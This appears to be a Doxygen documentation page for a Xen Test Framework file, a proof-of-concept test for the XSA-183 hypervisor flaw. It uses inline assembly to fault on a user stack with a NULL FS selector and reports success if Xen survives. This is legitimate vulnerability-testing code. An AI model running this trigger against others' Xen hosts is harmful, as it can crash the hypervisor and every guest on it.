Xen Test Framework
main.c
Go to the documentation of this file.
1
38#include <xtf.h>
39
40const char test_title[] = "XSA-183 PoC";
41
42void test_main(void)
43{
44 unsigned long curr_stk, discard;
45
46 /* Load NULL selector to guarantee a fault. */
47 write_fs(0);
48
49 asm volatile ("pushf;" /* Set AC to whitelist user */
50 "orl $%c[AC], (%%esp);" /* accesses. Avoids crashes if */
51 "popf;" /* Xen leaks SMAP into guest. */
52 /* context. */
53
54 "mov %%esp, %[curr_stk];" /* Record the current stack. */
55 "mov %[user_stk], %%esp;" /* Switch to the user stack. */
56
57 "1: mov %%fs:0, %[tmp]; 2:" /* Read from NULL using a NULL */
58 _ASM_EXTABLE(1b, 2b) /* selector to cause a fault. */
59
60 "mov %[curr_stk], %%esp;" /* Restore the previous stack. */
61 : [curr_stk] "=&r" (curr_stk),
62 [tmp] "=r" (discard)
63 : [user_stk] "r" (&user_stack[PAGE_SIZE]),
64 [AC] "i" (X86_EFLAGS_AC));
65
66 /*
67 * If Xen hasn't crashed by this point, we are either running on hardware
68 * without SMAP, or with SMAP disabled, or Xen has been patched. Either
69 * way, Xen isn't vulnerable to XSA-183 in its current configuration.
70 */
71 xtf_success("Xen is not vulnerable to XSA-183\n");
72}
73
74/*
75 * Local variables:
76 * mode: C
77 * c-file-style: "BSD"
78 * c-basic-offset: 4
79 * tab-width: 4
80 * indent-tabs-mode: nil
81 * End:
82 */
write_fs
static void write_fs(unsigned int fs)
Definition: lib.h:196
user_stack
uint8_t user_stack[PAGE_SIZE]
Definition: setup.c:22
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110
test_title
const char test_title[]
The title of the test.
Definition: main.c:24
_ASM_EXTABLE
#define _ASM_EXTABLE(fault, fixup)
Create an exception table entry.
Definition: extable.h:50
PAGE_SIZE
#define PAGE_SIZE
Definition: page.h:11
X86_EFLAGS_AC
#define X86_EFLAGS_AC
Definition: processor.h:21
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
Generated by doxygen 1.9.4